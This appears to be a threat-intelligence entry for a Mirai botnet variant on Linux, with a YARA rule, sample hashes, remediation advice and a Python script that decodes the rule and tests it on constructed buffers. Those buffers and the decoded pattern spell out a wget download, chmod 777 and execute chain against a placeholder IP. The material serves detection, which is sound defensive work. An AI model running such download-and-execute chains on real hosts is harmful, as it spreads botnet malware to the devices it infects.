Concrete signature match: DDoS for Linux platform, family Mirai
This is a confirmed Mirai botnet variant targeting Linux systems. It uses anti-honeypot checks to evade detection, and it downloads and executes malicious payloads, most likely to enslave devices for Distributed Denial of Service (DDoS) attacks.
No specific strings found for this threat
rule DDoS_Linux_Mirai_YC_2147742140_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "DDoS:Linux/Mirai.YC!MTB"
        threat_id = "2147742140"
        type = "DDoS"
        platform = "Linux: Linux platform"
        family = "Mirai"
        severity = "Critical"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
        threshold = "2"
        strings_accuracy = "Low"
    strings:
        $x_1_1 = {77 67 65 74 20 68 74 74 70 [0-2] 3a 2f 2f [0-3] 2e [0-3] 2e [0-3] 2e [0-3] 2f [0-96] 3b 20 63 68 6d 6f 64 20 37 37 37 20 2a 3b 20 2e 2f} //weight: 1, accuracy: Low
        $x_1_2 = "[antihoney] failed stage 1 honeypot detected!" ascii //weight: 1
    condition:
        (filesize < 20MB) and
        (all of ($x*))
}

94933297a9403b656dff2adc102a9783f25f866502bbc3b027894092fcb99186
06b1b6a7a36d525e34efe9faa1caf296d22a270da858d81c98b2e58d07d25ba0
b71213be693e8af5d19c2a015e572df8badcbfc9c84c2d33559b74f006b72c43

Immediately isolate any infected Linux systems. Perform a thorough scan to detect and remove the Mirai malware, patch all system vulnerabilities, enforce strong access controls and unique, complex passwords, and implement robust network segmentation with egress filtering to block communication with Mirai Command and Control (C2) servers.
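As an added example, not part of this page or of the threatcheck.sh rule set, the following Python shows what the rule above actually matches. It renders the $x_1_1 hex string so the literal bytes and the [m-n] byte jumps are readable, translates that hex string into a bytes regex, and applies the rule's condition (filesize < 20MB and all of ($x*)) to constructed sample buffers. The sample buffers, the 192.0.2.10 address (an RFC 5737 documentation address) and all function names are assumptions; the only YARA hex syntax handled is literal bytes and [m-n] jumps, which is all this rule uses.

```python
import re

# Strings copied from the YARA rule on this page.
YARA_HEX_X_1_1 = (
    "77 67 65 74 20 68 74 74 70 [0-2] 3a 2f 2f [0-3] 2e [0-3] 2e [0-3] 2e [0-3] 2f "
    "[0-96] 3b 20 63 68 6d 6f 64 20 37 37 37 20 2a 3b 20 2e 2f"
)
X_1_2 = b"[antihoney] failed stage 1 honeypot detected!"

# Tokenizer for the subset of YARA hex syntax this rule uses: literal bytes and [m-n] jumps.
# Assumption: no '??' wildcards or alternations, which the rule does not contain.
_TOKEN = re.compile(r"\[(\d+)-(\d+)\]|([0-9a-fA-F]{2})")


def render_hex_string(hex_string: str) -> str:
    """Show the literal bytes of a YARA hex string as text, keeping the jumps visible."""
    out = []
    for lo, hi, byte in _TOKEN.findall(hex_string):
        if byte:
            value = int(byte, 16)
            out.append(chr(value) if 32 <= value < 127 else f"\\x{value:02x}")
        else:
            out.append(f"[{lo}-{hi}]")
    return "".join(out)


def yara_hex_to_regex(hex_string: str) -> re.Pattern:
    """Translate a YARA hex string into a compiled bytes regex.

    Each literal byte becomes an escaped byte and each jump [m-n] becomes .{m,n};
    DOTALL makes '.' match any byte, including NUL and newline, as YARA jumps do.
    """
    parts = []
    for lo, hi, byte in _TOKEN.findall(hex_string):
        if byte:
            parts.append(re.escape(bytes([int(byte, 16)])))
        else:
            parts.append(b".{%d,%d}" % (int(lo), int(hi)))
    return re.compile(b"".join(parts), re.DOTALL)


PATTERN_X_1_1 = yara_hex_to_regex(YARA_HEX_X_1_1)


def matches_rule(data: bytes, max_size: int = 20 * 1024 * 1024) -> bool:
    """Apply the rule's condition: filesize < 20MB and all of ($x*).

    YARA's MB suffix is 1024-based, hence 20 * 1024 * 1024.
    """
    if len(data) >= max_size:
        return False
    return PATTERN_X_1_1.search(data) is not None and X_1_2 in data


# Constructed sample buffers (not real samples) that exercise each branch of the condition.
SAMPLE_BOTH_STRINGS = (
    b"\x7fELF\x00"
    b"cd /tmp; wget http://192.0.2.10/bins/x86; chmod 777 *; ./x86\x00"
    b"[antihoney] failed stage 1 honeypot detected!\x00"
)
SAMPLE_DOWNLOADER_ONLY = b"wget http://192.0.2.10/bins/x86; chmod 777 *; ./x86"
SAMPLE_CLEAN = b"wget https://example.com/release.tar.gz; tar xzf release.tar.gz"

if __name__ == "__main__":
    print(render_hex_string(YARA_HEX_X_1_1))
    for name, buf in [("both strings", SAMPLE_BOTH_STRINGS),
                      ("downloader only", SAMPLE_DOWNLOADER_ONLY),
                      ("clean", SAMPLE_CLEAN)]:
        print(f"{name}: {'MATCH' if matches_rule(buf) else 'no match'}")
```

The rendered form makes the rule's intent plain: it looks for a download-and-run shell chain whose URL host is a dotted-quad IP with at most three characters per octet, followed within 96 bytes by a chmod and execute of the fetched file. Because the condition requires all of ($x*), the download chain alone does not trigger the rule; the anti-honeypot string must be present too, which is why the second sample is reported as a non-match and why the rule's threshold is 2.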